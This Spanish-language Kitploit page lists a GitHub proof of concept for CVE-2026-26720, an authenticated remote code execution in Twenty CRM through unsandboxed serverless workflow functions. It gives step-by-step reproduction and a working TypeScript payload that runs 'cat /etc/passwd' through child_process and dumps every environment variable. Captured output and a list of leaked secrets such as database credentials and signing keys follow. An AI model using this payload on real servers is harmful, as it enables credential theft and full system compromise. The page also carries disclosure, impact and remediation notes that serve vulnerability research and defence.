Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-26720-Twenty-RCE — Prueba de concepto para la ejecución remota de código autenticada en Twenty CRM mediante funciones serverless sin sandbox, lo que permite la ejecución arbitraria de comandos Node.js y la divulgación de variables de entorno. | Kitploit
Herramientas/GitHubGitHub/dillonkirsch/cve-2026-26720-twenty-rce
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebSeguridad en la NubeMala Configuración
GitHubdillonkirsch/cve-2026-26720-twenty-rce

CVE-2026-26720-Twenty-RCE

Prueba de concepto para la ejecución remota de código autenticada en Twenty CRM mediante funciones serverless sin sandbox, lo que permite la ejecución arbitraria de comandos Node.js y la divulgación de variables de entorno.

Ver Repositorio
6hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Twenty CRM - Ejecución Remota de Código Autenticada (RCE)

Resumen

Producto: Twenty CRM

Vulnerabilidad: Ejecución Remota de Código (RCE) a través de Funciones Serverless de Workflows

Severidad: Crítica

Componente Afectado: Automatización de Workflows (Código - Función Serverless)

Versión Probada: v1.15.0

Este repositorio documenta una vulnerabilidad crítica en el motor de workflows de Twenty CRM. El componente "Código - Función Serverless" permite a usuarios autenticados ejecutar código Node.js arbitrario. Debido a la falta de sandboxing, es posible importar el módulo child_process y ejecutar comandos a nivel de sistema en el servidor host.

Detalles de la Vulnerabilidad

La aplicación permite a los usuarios crear workflows de automatización personalizados que incluyen un paso de ejecución de código. Si bien esto está pensado para la manipulación de datos, el entorno de ejecución no restringe adecuadamente el acceso a los módulos integrados de Node.js ni al sistema operativo subyacente.

Un atacante puede utilizar execSync de la librería child_process para:

  1. Ejecutar comandos de shell (por ejemplo, cat, ls, whoami).
  2. Leer archivos sensibles del sistema de archivos (por ejemplo, /etc/passwd).
  3. Volcar variables de entorno (process.env), revelando credenciales de base de datos, claves de API y secretos de la aplicación.

Prueba de Concepto (PoC)

Pasos para Reproducir

  1. Inicie sesión en Twenty CRM.
  2. Navegue a Configuración > Workflows.
  3. Cree un nuevo Workflow con un Disparador Manual.
  4. Agregue una acción: Código - Función Serverless.
  5. Pegue el siguiente payload de TypeScript en el editor de código:
root@kitploit:~
import { execSync } from 'child_process';

export const main = async (params: any): Promise<object> => {
  try {
    // 1. Ejecución Remota de Comandos: Leer usuarios del sistema
    const output = execSync('cat /etc/passwd').toString();
    
    // 2. Divulgación de Información: Volcar todas las variables de entorno (Secretos)
    const secrets = JSON.stringify(process.env);
    
    return { 
      data: output, 
      secrets: secrets 
    };
  } catch (e: any) {
    return { error: e.message };
  }
};

  1. Guarde y ejecute el workflow.

Code Overview

Salida Observada

El workflow se ejecuta correctamente y devuelve los datos del sistema.

Acceso a Archivos del Sistema (/etc/passwd):

root@kitploit:~
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
postgres:x:70:70:PostgreSQL user:/var/lib/postgresql:/bin/sh
...

Variables de Entorno Filtradas: El volcado de process.env reveló detalles de configuración críticos:

  • PG_DATABASE_URL (Credenciales de Base de Datos)
  • APP_SECRET (Claves de firma)
  • REDIS_URL
  • AWS_ACCESS_KEY (Si está configurado)

Impacto

Esta vulnerabilidad permite a un usuario autenticado (con permisos para crear workflows) lograr un Compromiso Total del Sistema.

  • Confidencialidad: Los atacantes pueden leer todos los datos de la base de datos y del sistema de archivos.
  • Integridad: Los atacantes pueden modificar el código de la aplicación, eliminar datos o inyectar malware.
  • Disponibilidad: Los atacantes pueden apagar el servidor o consumir todos los recursos.

Remediación

Para solucionar este problema, la función "Función Serverless" requiere un aislamiento adecuado.

  • Implementar Sandboxing: El código debe ejecutarse en un entorno restringido (por ejemplo, un sandbox VM2, un contenedor Docker dedicado sin acceso a red/volúmenes, o una micro-VM como Firecracker).
  • Restringir Módulos: Deshabilitar el acceso a módulos sensibles de Node.js como child_process, fs y net.
  • Depuración de Variables de Entorno: Asegurar que el contexto de ejecución no herede las variables de entorno del proceso padre (que contienen los secretos de la aplicación).

Cronología

  • 8 de enero de 2026: Vulnerabilidad descubierta.
  • [Fecha]: Reportada al equipo de seguridad de Twenty CRM.
  • [Estado]: En espera de parche.
Descargar herramienta